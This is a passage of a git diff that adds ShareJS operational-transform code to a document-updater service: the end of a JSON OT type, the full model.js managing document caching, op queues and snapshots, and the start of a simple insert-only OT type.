string') + } + if (elem.slice(key, key + c.sd.length) !== c.sd) { + throw new Error('Deleted string does not match') + } + parent[parentkey] = elem.slice(0, key) + elem.slice(key + c.sd.length) + } else if (c.li !== undefined && c.ld !== undefined) { + // List replace + json.checkList(elem) + + // Should check the list element matches c.ld + elem[key] = c.li + } else if (c.li !== undefined) { + // List insert + json.checkList(elem) + + elem.splice(key, 0, c.li) + } else if (c.ld !== undefined) { + // List delete + json.checkList(elem) + + // Should check the list element matches c.ld here too. + elem.splice(key, 1) + } else if (c.lm !== undefined) { + // List move + json.checkList(elem) + if (c.lm !== key) { + const e = elem[key] + // Remove it... + elem.splice(key, 1) + // And insert it back. + elem.splice(c.lm, 0, e) + } + } else if (c.oi !== undefined) { + // Object insert / replace + json.checkObj(elem) + + // Should check that elem[key] == c.od + elem[key] = c.oi + } else if (c.od !== undefined) { + // Object delete + json.checkObj(elem) + + // Should check that elem[key] == c.od + delete elem[key] + } else { + throw new Error('invalid / missing instruction in op') + } + } + } catch (error) { + // TODO: Roll back all already applied changes. Write tests before implementing this code. + throw error + } + + return container.data +} + +// Checks if two paths, p1 and p2 match. +json.pathMatches = function (p1, p2, ignoreLast) { + if (p1.length !== p2.length) { + return false + } + + for (let i = 0; i < p1.length; i++) { + const p = p1[i] + if (p !== p2[i] && (!ignoreLast || i !== p1.length - 1)) { + return false + } + } + + return true +} + +json.append = function (dest, c) { + let last + c = clone(c) + if ( + dest.length !== 0 && + json.pathMatches(c.p, (last = dest[dest.length - 1]).p) + ) { + if (last.na !== undefined && c.na !== undefined) { + return (dest[dest.length - 1] = { p: last.p, na: last.na + c.na }) + } else if ( + last.li !== undefined && + c.li === undefined && + c.ld === last.li + ) { + // insert immediately followed by delete becomes a noop. + if (last.ld !== undefined) { + // leave the delete part of the replace + return delete last.li + } else { + return dest.pop() + } + } else if ( + last.od !== undefined && + last.oi === undefined && + c.oi !== undefined && + c.od === undefined + ) { + return (last.oi = c.oi) + } else if (c.lm !== undefined && c.p[c.p.length - 1] === c.lm) { + return null // don't do anything + } else { + return dest.push(c) + } + } else { + return dest.push(c) + } +} + +json.compose = function (op1, op2) { + json.checkValidOp(op1) + json.checkValidOp(op2) + + const newOp = clone(op1) + for (const c of Array.from(op2)) { + json.append(newOp, c) + } + + return newOp +} + +json.normalize = function (op) { + const newOp = [] + + if (!isArray(op)) { + op = [op] + } + + for (const c of Array.from(op)) { + if (c.p == null) { + c.p = [] + } + json.append(newOp, c) + } + + return newOp +} + +// hax, copied from test/types/json. Apparently this is still the fastest way to deep clone an object, assuming +// we have browser support for JSON. +// http://jsperf.com/cloning-an-object/12 +const clone = o => JSON.parse(JSON.stringify(o)) + +json.commonPath = function (p1, p2) { + p1 = p1.slice() + p2 = p2.slice() + p1.unshift('data') + p2.unshift('data') + p1 = p1.slice(0, p1.length - 1) + p2 = p2.slice(0, p2.length - 1) + if (p2.length === 0) { + return -1 + } + let i = 0 + while (p1[i] === p2[i] && i < p1.length) { + i++ + if (i === p2.length) { + return i - 1 + } + } +} + +// transform c so it applies to a document with otherC applied. +json.transformComponent = function (dest, c, otherC, type) { + let oc + c = clone(c) + if (c.na !== undefined) { + c.p.push(0) + } + if (otherC.na !== undefined) { + otherC.p.push(0) + } + + const common = json.commonPath(c.p, otherC.p) + const common2 = json.commonPath(otherC.p, c.p) + + const cplength = c.p.length + const otherCplength = otherC.p.length + + if (c.na !== undefined) { + c.p.pop() + } // hax + if (otherC.na !== undefined) { + otherC.p.pop() + } + + if (otherC.na) { + if ( + common2 != null && + otherCplength >= cplength && + otherC.p[common2] === c.p[common2] + ) { + if (c.ld !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.ld = json.apply(clone(c.ld), [oc]) + } else if (c.od !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.od = json.apply(clone(c.od), [oc]) + } + } + json.append(dest, c) + return dest + } + + if ( + common2 != null && + otherCplength > cplength && + c.p[common2] === otherC.p[common2] + ) { + // transform based on c + if (c.ld !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.ld = json.apply(clone(c.ld), [oc]) + } else if (c.od !== undefined) { + oc = clone(otherC) + oc.p = oc.p.slice(cplength) + c.od = json.apply(clone(c.od), [oc]) + } + } + + if (common != null) { + let from, p, to + const commonOperand = cplength === otherCplength + // transform based on otherC + if (otherC.na !== undefined) { + // this case is handled above due to icky path hax + } else if (otherC.si !== undefined || otherC.sd !== undefined) { + // String op vs string op - pass through to text type + if (c.si !== undefined || c.sd !== undefined) { + if (!commonOperand) { + throw new Error('must be a string?') + } + + // Convert an op component to a text op component + const convert = function (component) { + const newC = { p: component.p[component.p.length - 1] } + if (component.si) { + newC.i = component.si + } else { + newC.d = component.sd + } + return newC + } + + const tc1 = convert(c) + const tc2 = convert(otherC) + + const res = [] + text._tc(res, tc1, tc2, type) + for (const tc of Array.from(res)) { + const jc = { p: c.p.slice(0, common) } + jc.p.push(tc.p) + if (tc.i != null) { + jc.si = tc.i + } + if (tc.d != null) { + jc.sd = tc.d + } + json.append(dest, jc) + } + return dest + } + } else if (otherC.li !== undefined && otherC.ld !== undefined) { + if (otherC.p[common] === c.p[common]) { + // noop + if (!commonOperand) { + // we're below the deleted element, so -> noop + return dest + } else if (c.ld !== undefined) { + // we're trying to delete the same element, -> noop + if (c.li !== undefined && type === 'left') { + // we're both replacing one element with another. only one can + // survive! + c.ld = clone(otherC.li) + } else { + return dest + } + } + } + } else if (otherC.li !== undefined) { + if ( + c.li !== undefined && + c.ld === undefined && + commonOperand && + c.p[common] === otherC.p[common] + ) { + // in li vs. li, left wins. + if (type === 'right') { + c.p[common]++ + } + } else if (otherC.p[common] <= c.p[common]) { + c.p[common]++ + } + + if (c.lm !== undefined) { + if (commonOperand) { + // otherC edits the same list we edit + if (otherC.p[common] <= c.lm) { + c.lm++ + } + } + } + // changing c.from is handled above. + } else if (otherC.ld !== undefined) { + if (c.lm !== undefined) { + if (commonOperand) { + if (otherC.p[common] === c.p[common]) { + // they deleted the thing we're trying to move + return dest + } + // otherC edits the same list we edit + p = otherC.p[common] + from = c.p[common] + to = c.lm + if (p < to || (p === to && from < to)) { + c.lm-- + } + } + } + + if (otherC.p[common] < c.p[common]) { + c.p[common]-- + } else if (otherC.p[common] === c.p[common]) { + if (otherCplength < cplength) { + // we're below the deleted element, so -> noop + return dest + } else if (c.ld !== undefined) { + if (c.li !== undefined) { + // we're replacing, they're deleting. we become an insert. + delete c.ld + } else { + // we're trying to delete the same element, -> noop + return dest + } + } + } + } else if (otherC.lm !== undefined) { + if (c.lm !== undefined && cplength === otherCplength) { + // lm vs lm, here we go! + from = c.p[common] + to = c.lm + const otherFrom = otherC.p[common] + const otherTo = otherC.lm + if (otherFrom !== otherTo) { + // if otherFrom == otherTo, we don't need to change our op. + + // where did my thing go? + if (from === otherFrom) { + // they moved it! tie break. + if (type === 'left') { + c.p[common] = otherTo + if (from === to) { + // ugh + c.lm = otherTo + } + } else { + return dest + } + } else { + // they moved around it + if (from > otherFrom) { + c.p[common]-- + } + if (from > otherTo) { + c.p[common]++ + } else if (from === otherTo) { + if (otherFrom > otherTo) { + c.p[common]++ + if (from === to) { + // ugh, again + c.lm++ + } + } + } + + // step 2: where am i going to put it? + if (to > otherFrom) { + c.lm-- + } else if (to === otherFrom) { + if (to > from) { + c.lm-- + } + } + if (to > otherTo) { + c.lm++ + } else if (to === otherTo) { + // if we're both moving in the same direction, tie break + if ( + (otherTo > otherFrom && to > from) || + (otherTo < otherFrom && to < from) + ) { + if (type === 'right') { + c.lm++ + } + } else { + if (to > from) { + c.lm++ + } else if (to === otherFrom) { + c.lm-- + } + } + } + } + } + } else if (c.li !== undefined && c.ld === undefined && commonOperand) { + // li + from = otherC.p[common] + to = otherC.lm + p = c.p[common] + if (p > from) { + c.p[common]-- + } + if (p > to) { + c.p[common]++ + } + } else { + // ld, ld+li, si, sd, na, oi, od, oi+od, any li on an element beneath + // the lm + // + // i.e. things care about where their item is after the move. + from = otherC.p[common] + to = otherC.lm + p = c.p[common] + if (p === from) { + c.p[common] = to + } else { + if (p > from) { + c.p[common]-- + } + if (p > to) { + c.p[common]++ + } else if (p === to) { + if (from > to) { + c.p[common]++ + } + } + } + } + } else if (otherC.oi !== undefined && otherC.od !== undefined) { + if (c.p[common] === otherC.p[common]) { + if (c.oi !== undefined && commonOperand) { + // we inserted where someone else replaced + if (type === 'right') { + // left wins + return dest + } else { + // we win, make our op replace what they inserted + c.od = otherC.oi + } + } else { + // -> noop if the other component is deleting the same object (or any + // parent) + return dest + } + } + } else if (otherC.oi !== undefined) { + if (c.oi !== undefined && c.p[common] === otherC.p[common]) { + // left wins if we try to insert at the same place + if (type === 'left') { + json.append(dest, { p: c.p, od: otherC.oi }) + } else { + return dest + } + } + } else if (otherC.od !== undefined) { + if (c.p[common] === otherC.p[common]) { + if (!commonOperand) { + return dest + } + if (c.oi !== undefined) { + delete c.od + } else { + return dest + } + } + } + } + + json.append(dest, c) + return dest +} + +if (typeof WEB !== 'undefined' && WEB !== null) { + if (!exports.types) { + exports.types = {} + } + + // This is kind of awful - come up with a better way to hook this helper code up. + exports._bt(json, json.transformComponent, json.checkValidOp, json.append) + + // [] is used to prevent closure from renaming types.text + exports.types.json = json +} else { + module.exports = json + + require('./helpers').bootstrapTransform( + json, + json.transformComponent, + json.checkValidOp, + json.append + ) +} diff --git a/services/document-updater/app/js/sharejs/types/model.js b/services/document-updater/app/js/sharejs/types/model.js new file mode 100644 index 0000000..af9fd0a --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/model.js @@ -0,0 +1,882 @@ +/* eslint-disable + no-console, + no-return-assign, + n/no-callback-literal, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS104: Avoid inline assignments + * DS204: Change includes calls to have a more natural evaluation order + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// The model of all the ops. Responsible for applying & transforming remote deltas +// and managing the storage layer. +// +// Actual storage is handled by the database wrappers in db/*, wrapped by DocCache + +let Model +const { EventEmitter } = require('node:events') + +const queue = require('./syncqueue') +const types = require('../types') + +const isArray = o => Object.prototype.toString.call(o) === '[object Array]' + +// This constructor creates a new Model object. There will be one model object +// per server context. +// +// The model object is responsible for a lot of things: +// +// - It manages the interactions with the database +// - It maintains (in memory) a set of all active documents +// - It calls out to the OT functions when necessary +// +// The model is an event emitter. It emits the following events: +// +// create(docName, data): A document has been created with the specified name & data +module.exports = Model = function (db, options) { + // db can be null if the user doesn't want persistance. + + let getOps + if (!(this instanceof Model)) { + return new Model(db, options) + } + + const model = this + + if (options == null) { + options = {} + } + + // This is a cache of 'live' documents. + // + // The cache is a map from docName -> { + // ops:[{op, meta}] + // snapshot + // type + // v + // meta + // eventEmitter + // reapTimer + // committedVersion: v + // snapshotWriteLock: bool to make sure writeSnapshot isn't re-entrant + // dbMeta: database specific data + // opQueue: syncQueue for processing ops + // } + // + // The ops list contains the document's last options.numCachedOps ops. (Or all + // of them if we're using a memory store). + // + // Documents are stored in this set so long as the document has been accessed in + // the last few seconds (options.reapTime) OR at least one client has the document + // open. I don't know if I should keep open (but not being edited) documents live - + // maybe if a client has a document open but the document isn't being edited, I should + // flush it from the cache. + // + // In any case, the API to model is designed such that if we want to change that later + // it should be pretty easy to do so without any external-to-the-model code changes. + const docs = {} + + // This is a map from docName -> [callback]. It is used when a document hasn't been + // cached and multiple getSnapshot() / getVersion() requests come in. All requests + // are added to the callback list and called when db.getSnapshot() returns. + // + // callback(error, snapshot data) + const awaitingGetSnapshot = {} + + // The time that documents which no clients have open will stay in the cache. + // Should be > 0. + if (options.reapTime == null) { + options.reapTime = 3000 + } + + // The number of operations the cache holds before reusing the space + if (options.numCachedOps == null) { + options.numCachedOps = 10 + } + + // This option forces documents to be reaped, even when there's no database backend. + // This is useful when you don't care about persistance and don't want to gradually + // fill memory. + // + // You might want to set reapTime to a day or something. + if (options.forceReaping == null) { + options.forceReaping = false + } + + // Until I come up with a better strategy, we'll save a copy of the document snapshot + // to the database every ~20 submitted ops. + if (options.opsBeforeCommit == null) { + options.opsBeforeCommit = 20 + } + + // It takes some processing time to transform client ops. The server will punt ops back to the + // client to transform if they're too old. + if (options.maximumAge == null) { + options.maximumAge = 40 + } + + // **** Cache API methods + + // Its important that all ops are applied in order. This helper method creates the op submission queue + // for a single document. This contains the logic for transforming & applying ops. + const makeOpQueue = (docName, doc) => + queue(function (opData, callback) { + if (!(opData.v >= 0)) { + return callback('Version missing') + } + if (opData.v > doc.v) { + return callback('Op at future version') + } + + // Punt the transforming work back to the client if the op is too old. + if (opData.v + options.maximumAge < doc.v) { + return callback('Op too old') + } + + if (!opData.meta) { + opData.meta = {} + } + opData.meta.ts = Date.now() + + // We'll need to transform the op to the current version of the document. This + // calls the callback immediately if opVersion == doc.v. + return getOps(docName, opData.v, doc.v, function (error, ops) { + let snapshot + if (error) { + return callback(error) + } + + if (doc.v - opData.v !== ops.length) { + // This should never happen. It indicates that we didn't get all the ops we + // asked for. Its important that the submitted op is correctly transformed. + console.error( + `Could not get old ops in model for document ${docName}` + ) + console.error( + `Expected ops ${opData.v} to ${doc.v} and got ${ops.length} ops` + ) + return callback('Internal error') + } + + if (ops.length > 0) { + try { + // If there's enough ops, it might be worth spinning this out into a webworker thread. + for (const oldOp of Array.from(ops)) { + // Dup detection works by sending the id(s) the op has been submitted with previously. + // If the id matches, we reject it. The client can also detect the op has been submitted + // already if it sees its own previous id in the ops it sees when it does catchup. + if ( + oldOp.meta.source && + opData.dupIfSource && + Array.from(opData.dupIfSource).includes(oldOp.meta.source) + ) { + return callback('Op already submitted') + } + + opData.op = doc.type.transform(opData.op, oldOp.op, 'left') + opData.v++ + } + } catch (error1) { + error = error1 + return callback(error.message) + } + } + + try { + snapshot = doc.type.apply(doc.snapshot, opData.op) + } catch (error2) { + error = error2 + return callback(error.message) + } + + // The op data should be at the current version, and the new document data should be at + // the next version. + // + // This should never happen in practice, but its a nice little check to make sure everything + // is hunky-dory. + if (opData.v !== doc.v) { + // This should never happen. + console.error( + 'Version mismatch detected in model. File a ticket - this is a bug.' + ) + console.error(`Expecting ${opData.v} == ${doc.v}`) + return callback('Internal error') + } + + // newDocData = {snapshot, type:type.name, v:opVersion + 1, meta:docData.meta} + const writeOp = + (db != null ? db.writeOp : undefined) || + ((docName, newOpData, callback) => callback()) + + return writeOp(docName, opData, function (error) { + if (error) { + // The user should probably know about this. + console.warn(`Error writing ops to database: ${error}`) + return callback(error) + } + + __guardMethod__(options.stats, 'writeOp', o => o.writeOp()) + + // This is needed when we emit the 'change' event, below. + const oldSnapshot = doc.snapshot + + // All the heavy lifting is now done. Finally, we'll update the cache with the new data + // and (maybe!) save a new document snapshot to the database. + + doc.v = opData.v + 1 + doc.snapshot = snapshot + + doc.ops.push(opData) + if (db && doc.ops.length > options.numCachedOps) { + doc.ops.shift() + } + + model.emit('applyOp', docName, opData, snapshot, oldSnapshot) + doc.eventEmitter.emit('op', opData, snapshot, oldSnapshot) + + // The callback is called with the version of the document at which the op was applied. + // This is the op.v after transformation, and its doc.v - 1. + callback(null, opData.v) + + // I need a decent strategy here for deciding whether or not to save the snapshot. + // + // The 'right' strategy looks something like "Store the snapshot whenever the snapshot + // is smaller than the accumulated op data". For now, I'll just store it every 20 + // ops or something. (Configurable with doc.committedVersion) + if ( + !doc.snapshotWriteLock && + doc.committedVersion + options.opsBeforeCommit <= doc.v + ) { + return tryWriteSnapshot(docName, function (error) { + if (error) { + return console.warn( + `Error writing snapshot ${error}. This is nonfatal` + ) + } + }) + } + }) + }) + }) + + // Add the data for the given docName to the cache. The named document shouldn't already + // exist in the doc set. + // + // Returns the new doc. + const add = function (docName, error, data, committedVersion, ops, dbMeta) { + let callback, doc + const callbacks = awaitingGetSnapshot[docName] + delete awaitingGetSnapshot[docName] + + if (error) { + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(error) + } + } + } else { + doc = docs[docName] = { + snapshot: data.snapshot, + v: data.v, + type: data.type, + meta: data.meta, + + // Cache of ops + ops: ops || [], + + eventEmitter: new EventEmitter(), + + // Timer before the document will be invalidated from the cache (if the document has no + // listeners) + reapTimer: null, + + // Version of the snapshot thats in the database + committedVersion: committedVersion != null ? committedVersion : data.v, + snapshotWriteLock: false, + dbMeta, + } + + doc.opQueue = makeOpQueue(docName, doc) + + refreshReapingTimeout(docName) + model.emit('add', docName, data) + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(null, doc) + } + } + } + + return doc + } + + // This is a little helper wrapper around db.getOps. It does two things: + // + // - If there's no database set, it returns an error to the callback + // - It adds version numbers to each op returned from the database + // (These can be inferred from context so the DB doesn't store them, but its useful to have them). + const getOpsInternal = function (docName, start, end, callback) { + if (!db) { + return typeof callback === 'function' + ? callback('Document does not exist') + : undefined + } + + return db.getOps(docName, start, end, function (error, ops) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + let v = start + for (const op of Array.from(ops)) { + op.v = v++ + } + + return typeof callback === 'function' ? callback(null, ops) : undefined + }) + } + + // Load the named document into the cache. This function is re-entrant. + // + // The callback is called with (error, doc) + const load = function (docName, callback) { + if (docs[docName]) { + // The document is already loaded. Return immediately. + __guardMethod__(options.stats, 'cacheHit', o => o.cacheHit('getSnapshot')) + return callback(null, docs[docName]) + } + + // We're a memory store. If we don't have it, nobody does. + if (!db) { + return callback('Document does not exist') + } + + const callbacks = awaitingGetSnapshot[docName] + + // The document is being loaded already. Add ourselves as a callback. + if (callbacks) { + return callbacks.push(callback) + } + + __guardMethod__(options.stats, 'cacheMiss', o1 => + o1.cacheMiss('getSnapshot') + ) + + // The document isn't loaded and isn't being loaded. Load it. + awaitingGetSnapshot[docName] = [callback] + return db.getSnapshot(docName, function (error, data, dbMeta) { + if (error) { + return add(docName, error) + } + + const type = types[data.type] + if (!type) { + console.warn(`Type '${data.type}' missing`) + return callback('Type not found') + } + data.type = type + + const committedVersion = data.v + + // The server can close without saving the most recent document snapshot. + // In this case, there are extra ops which need to be applied before + // returning the snapshot. + return getOpsInternal(docName, data.v, null, function (error, ops) { + if (error) { + return callback(error) + } + + if (ops.length > 0) { + console.log(`Catchup ${docName} ${data.v} -> ${data.v + ops.length}`) + + try { + for (const op of Array.from(ops)) { + data.snapshot = type.apply(data.snapshot, op.op) + data.v++ + } + } catch (e) { + // This should never happen - it indicates that whats in the + // database is invalid. + console.error(`Op data invalid for ${docName}: ${e.stack}`) + return callback('Op data invalid') + } + } + + model.emit('load', docName, data) + return add(docName, error, data, committedVersion, ops, dbMeta) + }) + }) + } + + // This makes sure the cache contains a document. If the doc cache doesn't contain + // a document, it is loaded from the database and stored. + // + // Documents are stored so long as either: + // - They have been accessed within the past #{PERIOD} + // - At least one client has the document open + function refreshReapingTimeout(docName) { + const doc = docs[docName] + if (!doc) { + return + } + + // I want to let the clients list be updated before this is called. + return process.nextTick(function () { + // This is an awkward way to find out the number of clients on a document. If this + // causes performance issues, add a numClients field to the document. + // + // The first check is because its possible that between refreshReapingTimeout being called and this + // event being fired, someone called delete() on the document and hence the doc is something else now. + if ( + doc === docs[docName] && + doc.eventEmitter.listeners('op').length === 0 && + (db || options.forceReaping) && + doc.opQueue.busy === false + ) { + let reapTimer + clearTimeout(doc.reapTimer) + return (doc.reapTimer = reapTimer = + setTimeout( + () => + tryWriteSnapshot(docName, function () { + // If the reaping timeout has been refreshed while we're writing the snapshot, or if we're + // in the middle of applying an operation, don't reap. + if ( + docs[docName].reapTimer === reapTimer && + doc.opQueue.busy === false + ) { + return delete docs[docName] + } + }), + options.reapTime + )) + } + }) + } + + function tryWriteSnapshot(docName, callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + const doc = docs[docName] + + // The doc is closed + if (!doc) { + return typeof callback === 'function' ? callback() : undefined + } + + // The document is already saved. + if (doc.committedVersion === doc.v) { + return typeof callback === 'function' ? callback() : undefined + } + + if (doc.snapshotWriteLock) { + return typeof callback === 'function' + ? callback('Another snapshot write is in progress') + : undefined + } + + doc.snapshotWriteLock = true + + __guardMethod__(options.stats, 'writeSnapshot', o => o.writeSnapshot()) + + const writeSnapshot = + (db != null ? db.writeSnapshot : undefined) || + ((docName, docData, dbMeta, callback) => callback()) + + const data = { + v: doc.v, + meta: doc.meta, + snapshot: doc.snapshot, + // The database doesn't know about object types. + type: doc.type.name, + } + + // Commit snapshot. + return writeSnapshot(docName, data, doc.dbMeta, function (error, dbMeta) { + doc.snapshotWriteLock = false + + // We have to use data.v here because the version in the doc could + // have been updated between the call to writeSnapshot() and now. + doc.committedVersion = data.v + doc.dbMeta = dbMeta + + return typeof callback === 'function' ? callback(error) : undefined + }) + } + + // *** Model interface methods + + // Create a new document. + // + // data should be {snapshot, type, [meta]}. The version of a new document is 0. + this.create = function (docName, type, meta, callback) { + if (typeof meta === 'function') { + ;[meta, callback] = Array.from([{}, meta]) + } + + if (docName.match(/\//)) { + return typeof callback === 'function' + ? callback('Invalid document name') + : undefined + } + if (docs[docName]) { + return typeof callback === 'function' + ? callback('Document already exists') + : undefined + } + + if (typeof type === 'string') { + type = types[type] + } + if (!type) { + return typeof callback === 'function' + ? callback('Type not found') + : undefined + } + + const data = { + snapshot: type.create(), + type: type.name, + meta: meta || {}, + v: 0, + } + + const done = function (error, dbMeta) { + // dbMeta can be used to cache extra state needed by the database to access the document, like an ID or something. + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + // From here on we'll store the object version of the type name. + data.type = type + add(docName, null, data, 0, [], dbMeta) + model.emit('create', docName, data) + return typeof callback === 'function' ? callback() : undefined + } + + if (db) { + return db.create(docName, data, done) + } else { + return done() + } + } + + // Perminantly deletes the specified document. + // If listeners are attached, they are removed. + // + // The callback is called with (error) if there was an error. If error is null / undefined, the + // document was deleted. + // + // WARNING: This isn't well supported throughout the code. (Eg, streaming clients aren't told about the + // deletion. Subsequent op submissions will fail). + this.delete = function (docName, callback) { + const doc = docs[docName] + + if (doc) { + clearTimeout(doc.reapTimer) + delete docs[docName] + } + + const done = function (error) { + if (!error) { + model.emit('delete', docName) + } + return typeof callback === 'function' ? callback(error) : undefined + } + + if (db) { + return db.delete(docName, doc != null ? doc.dbMeta : undefined, done) + } else { + return done(!doc ? 'Document does not exist' : undefined) + } + } + + // This gets all operations from [start...end]. (That is, its not inclusive.) + // + // end can be null. This means 'get me all ops from start'. + // + // Each op returned is in the form {op:o, meta:m, v:version}. + // + // Callback is called with (error, [ops]) + // + // If the document does not exist, getOps doesn't necessarily return an error. This is because + // its awkward to figure out whether or not the document exists for things + // like the redis database backend. I guess its a bit gross having this inconsistant + // with the other DB calls, but its certainly convenient. + // + // Use getVersion() to determine if a document actually exists, if thats what you're + // after. + this.getOps = getOps = function (docName, start, end, callback) { + // getOps will only use the op cache if its there. It won't fill the op cache in. + if (!(start >= 0)) { + throw new Error('start must be 0+') + } + + if (typeof end === 'function') { + ;[end, callback] = Array.from([null, end]) + } + + const ops = docs[docName] != null ? docs[docName].ops : undefined + + if (ops) { + const version = docs[docName].v + + // Ops contains an array of ops. The last op in the list is the last op applied + if (end == null) { + end = version + } + start = Math.min(start, end) + + if (start === end) { + return callback(null, []) + } + + // Base is the version number of the oldest op we have cached + const base = version - ops.length + + // If the database is null, we'll trim to the ops we do have and hope thats enough. + if (start >= base || db === null) { + refreshReapingTimeout(docName) + if (options.stats != null) { + options.stats.cacheHit('getOps') + } + + return callback(null, ops.slice(start - base, end - base)) + } + } + + if (options.stats != null) { + options.stats.cacheMiss('getOps') + } + + return getOpsInternal(docName, start, end, callback) + } + + // Gets the snapshot data for the specified document. + // getSnapshot(docName, callback) + // Callback is called with (error, {v: <version>, type: <type>, snapshot: <snapshot>, meta: <meta>}) + this.getSnapshot = (docName, callback) => + load(docName, (error, doc) => + callback( + error, + doc + ? { v: doc.v, type: doc.type, snapshot: doc.snapshot, meta: doc.meta } + : undefined + ) + ) + + // Gets the latest version # of the document. + // getVersion(docName, callback) + // callback is called with (error, version). + this.getVersion = (docName, callback) => + load(docName, (error, doc) => + callback(error, doc != null ? doc.v : undefined) + ) + + // Apply an op to the specified document. + // The callback is passed (error, applied version #) + // opData = {op:op, v:v, meta:metadata} + // + // Ops are queued before being applied so that the following code applies op C before op B: + // model.applyOp 'doc', OPA, -> model.applyOp 'doc', OPB + // model.applyOp 'doc', OPC + this.applyOp = ( + docName, + opData, + callback // All the logic for this is in makeOpQueue, above. + ) => + load(docName, function (error, doc) { + if (error) { + return callback(error) + } + + return process.nextTick(() => + doc.opQueue(opData, function (error, newVersion) { + refreshReapingTimeout(docName) + return typeof callback === 'function' + ? callback(error, newVersion) + : undefined + }) + ) + }) + + // TODO: store (some) metadata in DB + // TODO: op and meta should be combineable in the op that gets sent + this.applyMetaOp = function (docName, metaOpData, callback) { + const { path, value } = metaOpData.meta + + if (!isArray(path)) { + return typeof callback === 'function' + ? callback('path should be an array') + : undefined + } + + return load(docName, function (error, doc) { + if (error != null) { + return typeof callback === 'function' ? callback(error) : undefined + } else { + let applied = false + switch (path[0]) { + case 'shout': + doc.eventEmitter.emit('op', metaOpData) + applied = true + break + } + + if (applied) { + model.emit('applyMetaOp', docName, path, value) + } + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Listen to all ops from the specified version. If version is in the past, all + // ops since that version are sent immediately to the listener. + // + // The callback is called once the listener is attached, but before any ops have been passed + // to the listener. + // + // This will _not_ edit the document metadata. + // + // If there are any listeners, we don't purge the document from the cache. But be aware, this behaviour + // might change in a future version. + // + // version is the document version at which the document is opened. It can be left out if you want to open + // the document at the most recent version. + // + // listener is called with (opData) each time an op is applied. + // + // callback(error, openedVersion) + this.listen = function (docName, version, listener, callback) { + if (typeof version === 'function') { + ;[version, listener, callback] = Array.from([null, version, listener]) + } + + return load(docName, function (error, doc) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + clearTimeout(doc.reapTimer) + + if (version != null) { + return getOps(docName, version, null, function (error, data) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + doc.eventEmitter.on('op', listener) + if (typeof callback === 'function') { + callback(null, version) + } + return (() => { + const result = [] + for (const op of Array.from(data)) { + let needle + listener(op) + + // The listener may well remove itself during the catchup phase. If this happens, break early. + // This is done in a quite inefficient way. (O(n) where n = #listeners on doc) + if ( + ((needle = listener), + !Array.from(doc.eventEmitter.listeners('op')).includes(needle)) + ) { + break + } else { + result.push(undefined) + } + } + return result + })() + }) + } else { + // Version is null / undefined. Just add the listener. + doc.eventEmitter.on('op', listener) + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Remove a listener for a particular document. + // + // removeListener(docName, listener) + // + // This is synchronous. + this.removeListener = function (docName, listener) { + // The document should already be loaded. + const doc = docs[docName] + if (!doc) { + throw new Error('removeListener called but document not loaded') + } + + doc.eventEmitter.removeListener('op', listener) + return refreshReapingTimeout(docName) + } + + // Flush saves all snapshot data to the database. I'm not sure whether or not this is actually needed - + // sharejs will happily replay uncommitted ops when documents are re-opened anyway. + this.flush = function (callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + let pendingWrites = 0 + + for (const docName in docs) { + const doc = docs[docName] + if (doc.committedVersion < doc.v) { + pendingWrites++ + // I'm hoping writeSnapshot will always happen in another thread. + tryWriteSnapshot(docName, () => + process.nextTick(function () { + pendingWrites-- + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + }) + ) + } + } + + // If nothing was queued, terminate immediately. + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + } + + // Close the database connection. This is needed so nodejs can shut down cleanly. + this.closeDb = function () { + __guardMethod__(db, 'close', o => o.close()) + return (db = null) + } +} + +// Model inherits from EventEmitter. +Model.prototype = new EventEmitter() + +function __guardMethod__(obj, methodName, transform) { + if ( + typeof obj !== 'undefined' && + obj !== null && + typeof obj[methodName] === 'function' + ) { + return transform(obj, methodName) + } else { + return undefined + } +} diff --git a/services/document-updater/app/js/sharejs/types/simple.js b/services/document-updater/app/js/sharejs/types/simple.js new file mode 100644 index 0000000..41f7eed --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/simple.js @@ -0,0 +1,54 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This is a really simple OT type. Its not compiled with the web client, but it could be. +// +// Its mostly included for demonstration purposes and its used in a lot of unit tests. +// +// This defines a really simple text OT type which only allows inserts. (No deletes). +// +// Ops look like: +// {position:#, text:"asdf"} +// +// Document snapshots look like: +// {str:string} + +module.exports = { + // The name of the OT type. The type is stored in types[type.name]. The name can be + // used in place of the actual type in all the API methods. + name: 'simple', + + // Create a new document snapshot + create() { + return { str: '' } + }, + + // Apply the given op to the document snapshot. Returns the new snapshot. + // + // The original snapshot should not be modified. + apply(snapshot, op) { + if (!(op.position >= 0 && op.position <= snapshot.str.length)) { + throw new Error('Invalid position') + } + + let { str } = snapshot + str = str.slice(0, op.position) + op.text + str.slice(op.position) + return { str } + }, + + // transform op1 by op2. Return transformed version of op1. + // sym describes the symmetry of the op. Its 'left' or 'right' depending on whether the + // op being transformed comes from the client or the server. + transform(op1, op2, sym) { + let pos = op1.position + if (op2.position < pos || (op2.position === pos && sym === 